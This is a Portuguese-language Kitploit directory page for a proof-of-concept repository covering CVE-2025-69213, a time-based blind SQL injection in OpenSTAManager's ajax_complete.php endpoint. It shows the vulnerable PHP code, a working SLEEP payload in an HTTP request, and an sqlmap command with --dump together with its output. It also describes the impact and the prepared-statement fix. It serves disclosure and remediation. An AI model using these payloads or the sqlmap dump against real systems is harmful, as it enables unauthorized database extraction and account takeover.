Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69213 — Repositório de prova de conceito para CVE-2025-69213, demonstrando uma vulnerabilidade de injeção de SQL no endpoint ajax_complete.php do OpenSTAManager, com exploração cega baseada em tempo e orientações de remediação. | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2025-69213
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

Repositório de prova de conceito para CVE-2025-69213, demonstrando uma vulnerabilidade de injeção de SQL no endpoint ajax_complete.php do OpenSTAManager, com exploração cega baseada em tempo e orientações de remediação.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69213: OpenSTAManager tem uma Injeção de SQL em ajax_complete.php (endpoint get_sedi)

Visão Geral

CampoDetalhes
ID do CVECVE-2025-69213
GravidadeALTA
AvisoVer Aviso
Descoberto porLukasz Rybak

Produtos Afetados

  • devcode-it/openstamanager (versões: <= 2.9.8)

Classificação CWE

  • CWE-89: Neutralização Incorreta de Elementos Especiais usados em um Comando SQL ('Injeção de SQL')

Detalhes

Resumo

Existe uma vulnerabilidade de Injeção de SQL no endpoint ajax_complete.php ao manipular a operação get_sedi. Um atacante autenticado pode injetar código SQL malicioso através do parâmetro idanagrafica, levando a acesso não autorizado ao banco de dados.

Prova de Conceito

Código Vulnerável

Arquivo: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Fluxo de Dados

  1. Origem: $_GET['idanagrafica'] → get('idanagrafica')
  2. Vulnerável: Entrada do usuário concatenada diretamente na consulta SQL com aspas simples
  3. Sumidouro: $dbo->fetchArray($q) executa a consulta maliciosa

Exploração

PoC Manual (Injeção SQL cega baseada em tempo):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
imagem

Exploração com SQLMap:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

Saída do SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
imagem

Impacto

  • Exfiltração de Dados: Extração completa do banco de dados, incluindo credenciais de usuários, dados de clientes e registros financeiros
  • Escalação de Privilégios: Modificação da tabela zz_users para obter acesso administrativo
  • Integridade dos Dados: Modificação ou exclusão não autorizada de registros
  • Possível RCE: Via SELECT ... INTO OUTFILE se as permissões de arquivo permitirem

Versões Afetadas

  • OpenSTAManager: Verificado na versão mais recente (em dezembro de 2025)
  • Todas as versões que usam este endpoint provavelmente são afetadas

Remediação

Substitua a concatenação direta por declarações preparadas:

Antes:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

Depois:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Referências

  • OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: Neutralização Incorreta de Elementos Especiais usados em um Comando SQL

Crédito

Descoberto por: Łukasz Rybak

Referências

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

Aviso Legal

Este CVE foi divulgado de forma responsável, seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e de defesa.

Baixar ferramenta